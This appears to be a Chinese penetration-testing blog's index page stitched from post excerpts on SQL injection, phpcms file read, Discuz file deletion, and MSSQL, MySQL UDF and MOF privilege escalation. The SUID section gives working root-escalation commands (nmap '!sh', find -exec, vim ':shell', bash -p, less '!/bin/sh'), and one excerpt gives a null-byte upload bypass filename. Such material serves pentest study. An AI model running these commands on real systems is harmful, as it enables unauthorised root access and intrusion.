0x01 漏洞分析

本次漏洞发生在/user/del.php中，首先，这里的pagename和tablename可以看到都是通过POST方法传进来的，但是只是用trim函数简单的处理了一下，之后也没有任何过滤的手段了，因此是一个比较简单的sql注入了。

0x01 漏洞分析

首先本次漏洞的问题函数不在于某一处函数或者语句，而是在与多方面的因素共同作用，最终可以进行绕过从而进行任意文件读取。
在phpcms中，有一个file_down函数用来下载文件的，该函数位于/phpcms/libs/functions/global.func.php

0x01 前言

无意间发现一个代码审计的以前文章，是审计一篇cms的文章，然后就想着还没有认真的审计过一次呢，就跟着这篇文章的路子走一次吧，来开启我代码审计的篇章。

0x01 前言

之前网上爆的的是Discuz！<=3.4的任意文件删除漏洞，为什么这里变成3.3了呢？因为厂商已经把3.4的修复了，不过3.3版本还是存在问题的。

0x01 SUID

什么是suid？通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的权限。

0x02 SUID提权

那么什么是suid提权呢？我理解的就是有个文件，它有s标志，并且他输入root，那么我们运行这个程序就可以有了root的权限，并且这个程序还得能执行命令，不然没什么用处，那么我们就能从普通用户提升到了root权限了。

0x03 常见的可用于suid提权的命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

Nmap

Vim

find

Bash

More

Less

Nano

cp

0x04 查找符合条件的文件

1
2
3

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

0x05 详细介绍

• nmap
  老版的nmap(2.02-5.21)有相互的功能–interactive

  1 2 3

  nmap> !sh sh-3.2# whoami root

msf中也有相关的模块

1

exploit/unix/local/setuid_nmap

• find

如果find以SUID权限运行，所有通过find执行的命令都会以root权限运行。

1
2

touch test
find test -exec whoami \;

• vim

如果vim以SUID运行，就会继承root用户的权限，可以读取系统中所有的文件

1
2

vim/vi
:shell

• bash

1
2

bash -p
># id

• less/more

1
2

less /etc/passwd
!/bin/sh

在公司进行渗透测试项目，网站是asp的网站，有个上传点，但是上传的后缀名只能是jpg,gif,png，通过00截断绕过，但是文件名不能有asp，因此通过构造形如

1

aaa.cer%00.jpg

0x01 前提

如果xp_cmdshell组件被删除了话，还可以使用sp_oacreate来进行提权。

0x01 前提

1. getshell或者存在sql注入并且能够执行命令。

2. sql server是system权限，sql server默认就是system权限。

   阅读全文 »

0x01 UDF

UDF（user defined function）用户自定义函数，是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能，其添加的新函数都可以在sql语句中调用，就像调用本机函数一样。

0x01 前言

Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式（MOF）文件：

• 将MOF文件执行为命令行参数及Mofcomp.exe文件
• 使用IMofCompiler接口和$CompileFile方法
• 拖放到%SystemRoot%\System32\Wbem\MOF文件夹下的MOF文件中

使用MOF提权的前提是当前root账户可以复制文件到%SystemRoot%\System32\Wbem\MOF目录下。